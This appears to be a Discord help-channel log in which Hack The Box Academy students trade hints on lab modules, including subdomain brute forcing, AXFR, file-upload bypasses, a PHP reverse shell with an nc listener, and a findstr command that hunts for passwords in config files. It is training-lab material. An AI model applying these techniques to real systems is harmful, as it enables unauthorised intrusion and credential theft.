not yet ||i found both a local and remote db but the sa pw doesnt work and crackstation wont crack it||

minor stag
#

So you don't use it there

heavy edge
#

||my only guess is smtp, but the smtp server wont ping||

minor stag
#

Right click and run as administrator

heavy edge
#

i quit

minor stag
#

Don't quit

heavy edge
#

like im off my game today ke

minor stag
#

||You don't enter sa and the password into the program itself. You right click the program and run it as administrator. It'll ask you for the password you found from important.txt.||

heavy edge
#

it was way overthought

minor stag
#

Oh right. It took me like 45 mins of fumbling around and getting angry before I got it

heavy edge
#

yeah its one of those ** its not this easy it cant be this easy what the frick its actually this easy**

minor stag
#

I found medium harder than the hard lab personally

#

But mostly because of the frustrations at that last part

wise badger
#

Hello @rustic sage I am stuck at the same point..I did try to AXFR all subdomains but no help. Could you provide any pointers?

minor stag
#

Where are you stuck at?

fathom pendant
#

but also bruteforcing is the solution

#

there's a handy tool provided by the section

#

the answer will be a subdomain of a subdomain

heavy edge
#

made that WAY harder than need bbe

#

yeah you need to find a tool that helps with the enum

zealous oyster
#

Hi, I am working on the limited file uploads module. When i upload a svg file nothing is rendered in the page including the upload button, i then tried creating the svg with an online converter and that just echo'd the payload within the image.

Any help would be appreciated.

heavy edge
wise badger
#

Hello, I have found also subdomains of subdomains but none of them ends with 'x.x.x.203'

fathom pendant
#

it's gonna be a subdomain you can't just axfr to

#

do your initial subdomain enumeration of the base domain [inlanefreight.htb] and compile your list of subdomains to check from that

#

this is why the bruteforce tool is showcased

minor stag
#

Remember the question where you were asked how many zones there were? You have to enumerate those zones for subdomains

fathom pendant
minor stag
#

Oh that's from like 40 mins ago lol

#

I could've sworn it was in the second zone but it's been awhile

fathom pendant
#

It's in a zone you can't normally access

#

Which is why bruteforce

minor stag
#

Ah, right. I remember having a lot of issues with that particular lab

paper basalt
#

any ideas why proxychains curl http://172.16.5.135:80 works but proxychains firefox cant reach the webserver?

fathom pendant
#

¯_(ツ)_/¯

#

Try proxychains firefox website

paper basalt
fathom pendant
#

Also you don't need to specify port 80

#

It's likely you might have skipped a step

#

Also try commenting out the other conf line

paper basalt
#

randomly worked now.. Weird

wise badger
# fathom pendant but also bruteforcing is the solution

Hello, thanks for the answer but I tried now several SecLists to brute force but to no avail...and note these are very large files, it takes time to brute force and the connection over VPN / in-browser is sometime very unstable.

fathom pendant
#

The list given in the example works

#

If you use that tool in your initial enumeration, you WILL miss the subdomain that leads you to the answer

wise badger
fathom pendant
#

I.e. subdomain.inlanefreight.htb

#

The tool then checks [list].subdomain.inlanefreight.htb

gray merlin
#

I am going to be so happy when I am done with the AD Enum & Attacks module...

fathom pendant
#

It's tedious for sure

minor stag
#

The foothold PC on the Shells & Payloads live engagement is so painfully slow

heavy edge
#

Because if you’re not using the tool, you will not find the subdomain

#

Am I wrong in thinking that the way to get into the ||mysql account is via .ssh||

brittle arch
#

I am on the module Attack Common Applications, and I'm stuck on the Thick Client Applications in regards to Restart-Oracle.exe. No matter what I try and execute, or delete from the bat file in tmp, I don't end up with a restart-service.exe.. even if I run the monta.ps1 manually

heavy edge
gray merlin
heavy edge
#

I meant in general as almost everything is AD

gray merlin
rustic sage
#

hey

fathom pendant
heavy edge
gray merlin
heavy edge
#

I mean ya and no

fathom pendant
#

There's no real AV/EDR on the exam, but you're not really taught much evasion techniques

heavy edge
#

I know the exam is mostly aD as the overview says it

#

But corp environs are mostly ad now

gray merlin
#

I don't know what is going on...

heavy edge
#

Because it’s an important topic that everyone should not rush thru and get bored of

fathom pendant
#

¯_(ツ)_/¯

dim wolf
#

who gets bored of AD

fathom pendant
#

The ad enum module is just a fair bit of tedium

heavy edge
#

Frankly, I feel like ADP testing would be really fun.

dim wolf
#

i can't imagine anyone getting bored of AD

#

it's so big, so many attack vectors

heavy edge
#

Devs devs get bored of AD

fathom pendant
#

Not really boring, just if you have a wide net: it's gonna take ages

heavy edge
#

Oops wrong @

gray merlin
fathom pendant
#

I.e. running a broad query can take like 30 minutes

fathom pendant
gray merlin
#

In truth. I am learning a lot.

fathom pendant
#

Its like 20 sections

#

So it's a lot.

gray merlin
#

That is part of why the chapter is so heavy and is taking me a while.

sonic ridge
#

I have a question about the intercepting web requests module. When I use foxyproxy along with burp suite everything works fine and I can intercept requests. When I use zap with foxyproxy I get a login to network page. How do I fix this so I can use zap

#

oops I think this is the wrong section my bad

fathom pendant
#

This is the right channel

sonic ridge
#

Ok wasnt sure if I had to post to community help

fathom pendant
#

this is the right place for help with academy modules; if someone that's completed it comes by they're more likely to help here than in the community help forum

#

that forum is more for general help than module help

sonic ridge
#

ok cool

#

i got it working

upbeat oak
#

is there a known connection problem on the getting started knowledge check lab?

spiral spoke
#

Hello! I'm in SQL Injection Fundamentals > SQL Operators and the question is 'In the 'titles' table,*** what is the number of records*** WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?'

So *according * with the section, it needs something extra to learn beyond of the section because using what the section has shown it is not completely possible to know "the number of records", but you can see the records according with the section

I already have the answer to the question but I think could've been better that on the section would have shown that*** extra ***thing which is not shown. prayge

fathom pendant
#

aka their ID #

heavy hearth
#

Anyone completed the HTML injection in PDF module? I'm not sure how to complete the objective "access an internal web application and exfiltrate the flag. " since I can't receive a callback at interactsh or the tun0 adapter of the pwnbox ;\

fathom pendant
#

like if you're the 10000 employee your ID would be #<insert leading 0s>10000

spiral spoke
fathom pendant
#

well SQL injections is assuming fundamental knowledge of SQL queries

#

¯_(ツ)_/¯

upbeat oak
#

so on the getting started knowledge module I have a nc listener running and php reverse shell file saved into the theme edit page. When I go to click the link for the theme folder location which is http://gettingstarted.htb/theme/Innovation/template.php I get a server not found error

fathom pendant
#

then all you have to do is maybe use the built-in count feature to actually count

#

i forgor how to set up a count query

#

oh wait it might just be count(name)

#

for specifically that variable

spiral spoke
fathom pendant
#

technically you can just leave out the as

#

you'd only really include AS to have another variable

spiral spoke
spiral spoke
fathom pendant
fathom pendant
#

ok; because there's like 2-3 different SQL inject modules

#

so yeah I agree it should be included/talked about

#

but it doesn't hurt to have to do a bit of self-research

small scroll
#

Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet

upbeat oak
#

I'm running the knowledge check through openvpn should I just try start an instane since I can't connect to the server this way? I've tried re running this several times now

fathom pendant
hidden current
#

Hola amigos!

#

i'm new!

#

i need help

upbeat oak
quick crane
#

who can help me "INTRO TO WHITEBOX PENTESTING-Skills Assessment",I tried the payload in this module, but it still didn't work. For confidentiality reasons, I can't show my specific payload here. If anyone is willing to help, I can send the specific content via private message.

crimson moon
tame scroll
#

Is anyone else having problems spawning targets in HTB? trying to continue but Is not working

crimson moon
#

Pwnbox hasn’t got connection with my pc tried pinging it

tame scroll
#

it does not even generate the ip, maybe is to busy, will try later

fathom pendant
#

you can also ssh to the pwnbox from your own computer

#

but you can't do the reverse as it would require setting up port forwarding and other things

fathom pendant
crimson moon
fathom pendant
#

the pwnbox you connect to it via the eth0/public IP

#

running the vpn at the same time as the pwnbox will cause issues

tame scroll
#

is working now, ty!

crimson moon
fathom pendant
#

the username and password are different for the pwnbox machine; as it's still a secure environment

#

the password is randomly generated every time you launch the pwnbox and stored on the desktop

#

again that's going far out of the way to do basic things

vale tusk
#

Someone have problem with target hosts in network 10.129.x.x? 168 packet send, 95% loss. I use vpn, network 10.10.14.x. Module Windows priv escalation

crimson moon
#

This is the last time I will be using Pwnbox.

vale tusk
crimson moon
#

Target isn’t Spawning for me too using SG

fathom pendant
#

they are separate things

#

pwnbox region dictates where pwnbox spawns
vpn region dictates where target spawns

mild cypress
#

Could use a hand with File Upload Attack - Blacklist Filters (https://academy.hackthebox.com/module/136/section/1288) if anyone is able to help. None of the file extensions seem to execute my payload and I've definitely hit a wall. Happy to discuss what I've tried in more detail but don't wanna spoiler too much here 😅

Update: Was able to get this working, but never with ?cmd=id (or whatever command) and don't know why 😦

crimson moon
fathom pendant
#

yes

#

pwnbox exclusively refers to the in-browser vm that spawns when you click "Start Instance"

#

target refers to the machine you are attacking; "Click here to spawn target"

crimson moon
#

So if I choose any region let’s say SG for instance both Pwnbox and Target will spawn jn that region ?

cloud urchin
#

can i get a hint on web services & api attacks? twist of sqli. i can't find the parameter that's vulnerable, i tried the example wordlist and i tried a much bigger wordlist. what wordlist should i use here?

mild cypress
fathom pendant
#

pwnbox only spawns in the pwnbox region

#

target only spawns in the target region

#

they are separate for those purposes

mild cypress
next bronze
#

what's the file that you uploaded and the full url that you gave?

mild cypress
#

I used intruder to upload it with every possible extension, and then checked each extension with a command both with intruder and manually and have only hit 404s.

Was able to figure out what extension was working by uploading some php that just echod some text, and then upload an interactive shell that worked fine. URL based was the only issue 🤷

next bronze
#

I mean if it's 404 that means the url is wrong or something, causing it to request a file that's not there

mild cypress
#

Well, now I'm even more confused, haha. Gonna come back at it tomorrow and try to figure out what went wrong 🤷 Thanks for the input.

quick crane
frosty pebble
#

hi there. i downloaded mp3 that make application crash (probably because of meta data). Is anyone has time to check that or talk about it?

fathom pendant
frosty pebble
#

thank you for your help. I cant believe how the world would be without you Marcie and those precious advice

alpine umbra
#

hey guys i am on web info gathering module i want to find cms on app.inlanefreight.local host i already run whatweb command but no luck.

#

can anyone help me?

fathom pendant
alpine umbra
#

hey what is cms on vhost

fathom pendant
#

Use tools to find it out

#

Whatweb is a decent tool for some of it

rustic sage
#

What about the module "Learning Process" in HTB academy?

#

Should we do it?

heavy marsh
#

Anyone else have issues with ffuf on subdomain enumeration? It's killing my connection after ~800 attempts.

fathom pendant
heavy marsh
#

Kills my VM connection whether I'm on VPN or not, since VPN isn't needed for this exercise I tried with and without

#

Gobuster also had the same issue, however it got further through the list

#

Googled all over found some other posts/forums that had the same issue but no clear resolution

fathom pendant
#

That might just be a networking issue on your end

#

Sounds like your bandwidth is getting thwacked

cloud urchin
#

Sounds like something is not right, you do need to be connected to the VPN in order to enumerate with fuff. unless you're talking about an attack box?

heavy marsh
#

How would I verify that? I have very good internet quality.

fathom pendant
cloud urchin
#

ahhh

fathom pendant
#

Not a private domain

cloud urchin
#

nm sorry

heavy marsh
#

no worries

fathom pendant
#

Inlanefreight.com is a real {fictional} website for a fake Company that htb uses and references

cloud urchin
#

yeah i've been working with inlanefreight.local for days so i didn't really process it lol

heavy marsh
#

I tried with http: instead of https: as well, same thing

#

What's weird is it only kills my VM connection, not my Windows connection

cloud urchin
#

it very well could be your connection if it's poor, there may be an option to manually set the amount of threads ffuf uses, try lowering it

rustic sage
#

hi

fathom pendant
cloud urchin
#

the flag -t <number> dictates how many threads run, default is 40. try lowering it to like 20 or 10.

cloud urchin
#

try 5 or like 1

heavy marsh
shut quest
#

you can try -t 5 -p 0.1 to really slow it down

cloud urchin
#

if you have a subscription and the attackbox reaches the internet you may be able to do it from the attack box which has a more stable connection

heavy marsh
#

I can't win!

#

Oh, wait, it's going again now. I'll see if it stops at it's normall 800 ish

#

Yeah, froze at 801.

fathom pendant
#

Maybe something in your list is broken

severe eagle
#

hey everyone on the Common service attacks dns attack and ettercap wont work with tun0

#

anyone else have this issue

fathom pendant
#

I didn't have to use ettercap

severe eagle
#

oh ok

#

i have the sub **.inl....htb but when i dig i get nothing?

#

my command is dig AXFG **.inlanefreight.htb inlanefreight.htb and i have tried with ip as well

#

i have looked on previous posts

#

just no luck this is going full week now lol any help anyone

#

i get a cookie but that isnt the answer?

austere osprey
#

Working on the Intro to noSQL Injection, since I'm automating everything I found bmdyy's flag before the section arrived loool
Only now I understood where this flag belongs😹

acoustic owl
fathom pendant
severe eagle
#

so happy i got thank you MarcieLee I just realised this whole time was 1 letter was wrong

#

thank you again

fathom pendant
#

kek it's always the one letter

rustic sage
#

Hi

#

guyss when we take the exam, do we use our own vm or must use htb web based pwnbox? idk if it written anywhere tho :/

#

IDK

austere osprey
mint lodge
quick crane
minor stag
#

This module requires crackmapexec for me to get smb passwords but I can't get crackmapexec to work to save my life. It has a python3-neo4j dependency, but I can't find an installation for that. I installed neo4j via pip but it doesn't want to use that one

minor stag
#

Nvm. I just used hydra instead.

fathom pendant
#

You don't install neo4j with pip afaik

#

But also: use netexec

minor stag
#

I also found I can install crackmapexec via poetry and was able to run it that way, but that's the only way I've found so far.

fathom pendant
minor stag
#

Regardless, it did work at least. I don't really even know what poetry is

fathom pendant
#

Its a dev-like tool

minor stag
#

Is netexec a replacement for crack?

fathom pendant
#

Yes

minor stag
#

Awesome, I'll try that one

fathom pendant
#

It's literally cme, but better

#

(By literally, I do mean it)

minor stag
#

Is there an alternate tool to Evil-winrm that you're aware of?

#

The gem install just hangs

fathom pendant
#

nope

#

well psexec but it's far worse imo

proven panther
#

Hello, im doing the cracking passwords with hashcat module on the exercise to crack the provided zip. On my VM i get erros 'CL_BUILD_PROGRAM_FAILURE' and 'Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.' Anyone know how to solve this?

fathom pendant
#

sounds like you have the wrong hashcat version installed

proven panther
#

Says hashcat is already the latest version when i do apt install hashcat

#

v6.1.1

minor stag
#

What am I doing wrong here?

fathom pendant
#

:) it sounds like it doesn't have the right build stuff

proven panther
fathom pendant
fathom pendant
#

this issue can occur while, for instance, trying to run the arm compatible one on an amd cpu

proven panther
#

I am using a amd cpu and gpu, where can i find one that will work with these?

fathom pendant
#

but should also be in apt

minor stag
proven panther
fathom pendant
fathom pendant
proven panther
fathom pendant
#

i meant install hashcat

#

ya goon

proven panther
fathom pendant
#

ok so it sounds like something broke in the install

#

sudo apt purge hashcat

#

restart vm
sudo apt install hashcat

proven panther
#

no luck, still get the same errors

minor stag
austere osprey
vital haven
#

Someone with experience in CTF ? PV

gloomy nebula
#

How to install vpn tutorial ?

acoustic owl
shadow current
#

On module Password attacks:
What is the default password of every newly created Inlanefreight Domain user account? (Format: Case-Sensitive)

i already tried to use findstr findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml *.exe

still no luck i already found the answer to the last question this is the last one keeping me on finishing the section